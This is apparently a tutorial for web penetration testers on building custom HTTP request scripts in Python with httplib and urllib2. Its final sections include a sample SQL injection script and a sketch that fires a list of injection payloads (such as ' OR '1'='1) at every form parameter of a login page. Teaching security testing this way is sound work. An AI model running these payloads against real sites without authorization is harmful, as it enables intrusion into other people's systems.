Python for Web application security professionals
Introduction:
Python is an open source, interactive, object-oriented programming language. It is easy to learn yet a powerful high-level language. It runs on Windows, Linux, UNIX, and Mac OS X, and it is free to use, even for commercial purposes, because it is released under an open source license. It can be used to write custom tools and scripts for special purposes during the security assessment of an application.
Why program when scanners are available?
Commercial vulnerability scanners are available and can be used for vulnerability discovery. However, such scanners have their own limitations, and even the most advanced ones sometimes fail to provide full coverage. This makes the job of a penetration tester more difficult, since a lot can be missed, especially if the product is complex. This is where custom scripts and tools come into the picture. They help fill the gaps left by the scanner because they are tailored to the target application rather than being general purpose.
Scanners tend to perform poorly when the target application is very complex, leaving many pages of the application uncovered. The result is false negatives: real issues that go unreported. For the security team, and for a management that relies entirely on scanners to automate vulnerability assessment, false negatives are far more challenging than false positives, which are incorrectly reported issues. A security analyst can review and eliminate a false positive, but nobody reviews a false negative, because it never appears in the report.
Note that custom tools written for a specialized purpose in languages like Python should not replace vulnerability scanners. Ideally they are used in addition to scanners to get the best results.
Objective:
The aim of this article is to introduce web application penetration testers to Python and to explain how Python can be used to make customized HTTP requests. These requests can in turn serve as the basis for custom scripts and tools for the special conditions where scanners fail. Readers will be introduced to libraries that help a penetration tester make custom HTTP requests using Python.
Intended Audience:
Anyone interested in learning the basics of developing custom tools or scripts will find this article interesting, although it has been written with web application penetration testers as the primary audience.
Out of Scope:
This article focuses only on aspects relevant to the security assessment of web-based applications. Python can also be used to develop tools that aid in malware analysis, network security assessments, forensics, and so on, but those areas are out of scope here. Instead, the article concentrates on modules that can be used to make custom HTTP requests using Python. Last but not least, this is not a Python language tutorial. If you are interested in learning the basics of the Python language itself, there are many tutorials available.
Readers new to Python are strongly advised to take a crash course on the language before starting this article.
Setting up the Environment
This article will not go into the details of setting up the environment, which is straightforward. Installers for Python can be downloaded from http://www.python.org/getit/
If you are a Linux or Macintosh user, chances are high that you don't have to install Python: Apple ships it pre-installed on the Macintosh, and most Linux distributions include it as well. To check whether Python is installed on your system, open a terminal and type "python". If Python is installed, the interpreter starts, as shown in the following screenshot:
[Screenshot: the Python interpreter started from a terminal on OS X]
Although the example here is for OS X, a Linux installation should not look much different.
Windows users can download the installer from the URL mentioned above and install Python. To make Python easier to use, Windows users can add it to the system path by editing the PATH environment variable. Once that is done, the Python interpreter can be started from the command prompt regardless of the current working directory.
Python Modules for crafting HTTP Requests
Python has multiple modules that can be used to generate custom HTTP requests. We'll cover two of them. Both can be used to develop customized scripts that fire our payloads and perform the same actions a penetration tester performs manually, the only difference being that a script does the work. The modules that we will cover are httplib and urllib2.
httplib
This module has been renamed to http.client in Python 3. However, since this article uses version 2.7.*, I will stick with httplib throughout. Normally this module is not used directly; instead, the urllib module uses it internally to make HTTP requests. Interested users can nevertheless use it directly.
To send a custom request, we follow these four steps:
- Import the library
Before using a library, we need to import it. Here we import httplib, which we will use to send HTTP requests and receive the responses.
- Create a connection
Once the library is imported, we can start using it straight away. First we create a connection object by calling the HTTPConnection() constructor with the target host.
- Send the HTTP request
So far nothing has been sent on the wire. To send the request, call the connection's request() method. It sends the HTTP request over the network to the target web server using the HTTP method passed as the first argument (GET in our case, as shown in the following figure).
- Get the HTTP response
Now that the request has been sent, we call the getresponse() method to obtain the server's response. It returns an HTTP response object whose read() method returns the output generated by the server.
The following screenshot shows these four steps executed from an interpreter:
[Screenshot: the four steps run in the Python interpreter; the request returns a 302 redirect]
In our case, the HTTP request results in a 302 redirect. Note that printing the "res" variable directly is not useful, since it only refers to the HTTP response object. Calling its read() method returns the raw body sent by the target web server, as shown in the figure above.
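The four steps above can be sketched as a small function. This is only an illustration under a few assumptions: the function name fetch_once and its parameters are hypothetical and not part of httplib, and the import falls back to http.client so that the same sketch also runs on Python 3.

```python
# Step 1: import the library.
try:
    import httplib                     # Python 2.7, as used in this article
except ImportError:
    import http.client as httplib      # the same API under its Python 3 name


def fetch_once(host, path="/", port=80, timeout=10):
    """Send one GET request and return (status, reason, body).

    Hypothetical helper for illustration; it is not part of httplib.
    """
    # Step 2: create the connection object. Nothing is sent yet.
    conn = httplib.HTTPConnection(host, port, timeout=timeout)
    try:
        # Step 3: send the request to the server using the GET method.
        conn.request("GET", path)
        # Step 4: get the response object, then read the body from it.
        res = conn.getresponse()
        return res.status, res.reason, res.read()
    finally:
        conn.close()
```

Calling fetch_once("test_target.site", "/login.aspx") against a reachable host would return the status code, the reason phrase, and the raw body. httplib does not follow redirects, so a 302 is returned to the caller as is.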
urllib2
"urllib2" differs a little from "httplib" when it comes to creating and sending HTTP requests. We don't have to open a connection first; after importing the module, we can make a request directly.
This is much simpler than httplib. Readers are encouraged to use urllib2, which is generally the recommended choice in the Python community.
Readers should go through the Python documentation to see which functions the urllib2 module supports, so that they can explore the full potential of this library and use it when creating their own tools or scripts.
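As a minimal sketch of the urllib2 approach, the function below makes a request with a single urlopen() call. The name fetch_url is hypothetical, and the fallback import of urllib.request is an assumption added so that the sketch also runs on Python 3.

```python
try:
    import urllib2                     # Python 2.7, as used in this article
except ImportError:
    import urllib.request as urllib2   # provides urlopen() on Python 3


def fetch_url(url, timeout=10):
    """Request a URL in one call and return (status code, body).

    Hypothetical helper for illustration; it is not part of urllib2.
    """
    # No connection object is needed: urlopen() connects, sends the
    # request, and returns a file-like response object.
    response = urllib2.urlopen(url, timeout=timeout)
    try:
        return response.getcode(), response.read()
    finally:
        response.close()
```

Unlike httplib, urlopen() follows redirects automatically, so a page that answers with a 302 will normally show up here as the final page rather than as the redirect itself.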
In the following section, we'll look at a sample SQL injection tool that I created for demonstration purposes only. It hits the login page of a website and injects a single payload.
Sample SQL Injection Script:
The following is a simple script:
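[python]
import urllib
import urllib2

# Target login page and the form fields it expects
location = "http://test_target.site/login.aspx"
# A single quote in the username field is the injected payload
values = {"username":"'","password":"password","btnSubmit":"Login"}

# URL-encode the form fields so they can be sent as the POST body
data = urllib.urlencode(values)
# Passing data makes urllib2 send a POST instead of a GET
req = urllib2.Request(location,data)
response = urllib2.urlopen(req)
page_data = response.read()
print page_data
[/python]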
First we import the urllib and urllib2 libraries. We then assign the target URL to the variable "location" and the POST data to the variable "values". Next we URL-encode the POST data, submit the request to the server, and read the response we receive.
The script above only shows how easily one can create custom tools. It is far from perfect and would need considerable modification before practical use. It fires only one request, whereas a real tool should fire many requests by iterating over a list of payloads. A real tool also has to take care of session management, which means dealing with cookies and with other HTTP headers such as Referer and Content-Type. To ensure coverage, it must also iterate over a list of URLs until every payload has been fired at each parameter. Going through the libraries and the functions they support to work out how to build such a tool is left as an exercise for the reader.
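One possible starting point for that exercise is sketched below. It is not a finished tool. The payload list, the User-Agent string, and the function names build_session, mutated_forms, and fire are all hypothetical. The Python 3 fallback imports are an assumption added so that the sketch runs on both versions.

```python
try:                                    # Python 2.7 names, as used in the article
    import urllib2
    import cookielib
    from urllib import urlencode
except ImportError:                     # Python 3 equivalents
    import urllib.request as urllib2
    import http.cookiejar as cookielib
    from urllib.parse import urlencode

# Hypothetical payload list; a real tool would load a much larger one.
PAYLOADS = ["'", "' OR '1'='1", "\" OR \"1\"=\"1"]


def build_session(referer):
    """Return (opener, jar): an opener that keeps cookies between requests."""
    jar = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))
    # These headers are sent with every request made through the opener.
    opener.addheaders = [("Referer", referer),
                         ("User-Agent", "custom-sqli-sketch")]
    return opener, jar


def mutated_forms(values, payloads):
    """Yield (parameter, payload, form) with one field replaced per form."""
    for name in sorted(values):
        for payload in payloads:
            form = dict(values)         # copy so the baseline stays untouched
            form[name] = payload
            yield name, payload, form


def fire(opener, location, values, payloads):
    """POST every mutated form; yield (parameter, payload, status, body)."""
    for name, payload, form in mutated_forms(values, payloads):
        data = urlencode(form).encode("ascii")
        try:
            response = opener.open(location, data)
            status, body = response.getcode(), response.read()
        except urllib2.HTTPError as err:    # error pages are worth reading too
            status, body = err.code, err.read()
        yield name, payload, status, body
```

A caller would create the opener once with build_session(location) and then loop over fire(opener, location, values, PAYLOADS), inspecting each returned body for signs of a database error. Deciding what counts as such a sign depends on the target application and is deliberately left out of the sketch.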
Conclusion:
Python is an easy-to-learn language that helps penetration testers create custom tools to achieve coverage, plugging the holes that vulnerability scanners sometimes leave when they are unable to reach certain pages for one reason or another. Users can write reusable code by taking advantage of Python's object orientation, creating classes that can be inherited and extended. Python can be used not only for quick and dirty scripting of small automation tasks but also for building enterprise-class vulnerability scanning routines.